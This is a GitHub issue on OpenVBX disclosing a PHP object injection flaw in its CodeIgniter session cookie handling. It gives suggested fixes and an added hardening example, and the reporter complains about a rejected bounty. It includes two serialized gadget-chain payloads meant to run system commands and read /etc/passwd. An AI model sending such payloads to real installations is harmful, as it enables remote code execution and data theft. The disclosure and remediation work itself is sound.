twilio / OpenVBX

OpenVBX is a web-based open source phone system for business.
http://openvbx.org

Php Object Injection #439

Open devcoinfet opened 5 years ago

devcoinfet commented 5 years ago

1.) function sess_destroy()
2.) function _set_cookie($cookie_data = NULL)

https://github.com/twilio/OpenVBX/blob/7ed912adfc80aa7c5294cc47ebefb11b91ca6c6f/system/libraries/Session.php

Both make calls to a serialize function that appears controllable with a payload like this:

attack_one = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"memcached";O:17:"CodeIgniter\Model":5:{s:10:"builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"primaryKey";N;s:15:"beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:3:"cat";}}}s:13:"validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:11:"/etc/passwd";}}"""

attack_two = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"memcached";O:17:"CodeIgniter\Model":5:{s:10:"builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"primaryKey";N;s:15:"beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:6:"system";}}}s:13:"validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:2:"id";}}"""

Not exact and may need tweaking, just examples.

========================================================================

Impact

Encryption is off by default. You are using what appears to be an md5 to verify the data was not modified, like a csrf token.

What happens is you call _unserialize and for some reason decide to overload an insecure function by not securing it but just checking it,

then deciding to add an md5 to the end to verify it isn't tainted. Well, with the original request intercepted we can now sign the md5

and attempt to execute a php object injection attack.

Suggestions

Never use a collidable hash like md5 to generate a nonce.

Use something like sha1 and try to implement encryption by default with a random seed, and make it different for all.

Never store critical data client-side in an effort to save yourself resources, like you guys did with OpenVBX,

and never trust any data that is provided by a user, ever.

```php
protected function _serialize($data)
{
    if (!is_scalar($data)) {
        $data = serialize($data); // -> right here you're overloading an insecure function with an insecure function in php, this is very dangerous
    }
    return $data;
}
```

Also, kindly tell me why this was rejected as a paying bounty on Bugcrowd for me when it's an RCE against one of your products with 200 plus customers?

FYI, your Bugcrowd team also said they weren't patching it. Is this standard practice, to not pay for RCE bounties when customers are using it? I'm confused, as well as: at least patch it. I mean, you guys completely hid the fact I even reported it since it didn't fall under your program; I am legally able to call you out on it here in front of your customers.

I am not trying to be rude etc., but I do what I do and barely get paid for it. I don't take kindly to companies saying we're not patching it and we're not paying and we could care less. People like me do care; you have 200 customers out there possibly vulnerable, and this was completely dismissed and in fact could be very serious.
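As an added example (not OpenVBX or CodeIgniter code, and not from the reporter), the hardening the suggestions above point at, applied to a client-side session cookie: the integrity check uses a keyed HMAC instead of an unkeyed md5, the MAC is verified with a constant-time comparison before anything is parsed, and the payload is JSON rather than serialize() output, so the cookie can never instantiate PHP objects. Function names, the cookie layout, and the sample session values are assumptions made for this example.

```php
<?php
// Added example, not project code. Keeps session state client-side but
// authenticates it with hash_hmac over a server-held key and decodes it with
// json_decode, so a tampered or attacker-built cookie is rejected before any
// deserialization and no object is ever created from cookie bytes.

function sealSessionCookie(array $data, string $key): string
{
    $payload = json_encode($data, JSON_THROW_ON_ERROR);
    $mac = hash_hmac('sha256', $payload, $key);   // keyed MAC, 64 hex chars
    return base64_encode($payload) . '.' . $mac;
}

function openSessionCookie(string $cookie, string $key): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$b64, $mac] = $parts;
    $payload = base64_decode($b64, true);
    if ($payload === false) {
        return null;
    }
    // Verify first, in constant time; a forged cookie never reaches the decoder.
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {
        return null;
    }
    $data = json_decode($payload, true, 512, JSON_THROW_ON_ERROR);
    return is_array($data) ? $data : null;
}

// If legacy serialize() cookies must still be read during a migration, refuse
// object instantiation outright: an "O:..." record becomes __PHP_Incomplete_Class,
// so no __wakeup/__destruct of any class can run from cookie data.
function legacyUnserialize(string $payload)
{
    return unserialize($payload, ['allowed_classes' => false]);
}

// Demo with a constructed session (not a real OpenVBX cookie).
$key = random_bytes(32);                       // assumption: loaded from server config in practice
$cookie = sealSessionCookie(['user_id' => 42, 'last_activity' => time()], $key);
var_dump(openSessionCookie($cookie, $key));    // the session array
$forged = sealSessionCookie(['user_id' => 1], 'attacker-guessed-key');
var_dump(openSessionCookie($forged, $key));    // NULL: MAC under the wrong key
```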

devcoinfet commented 5 years ago

I am actually seeing far more than those two that I think are controllable sinks. I am requesting you guys do a review of your code and let me know if this is exploitable. Me and a friend are setting up a lab to find out, but either way your customers need to know this is possibly wrong.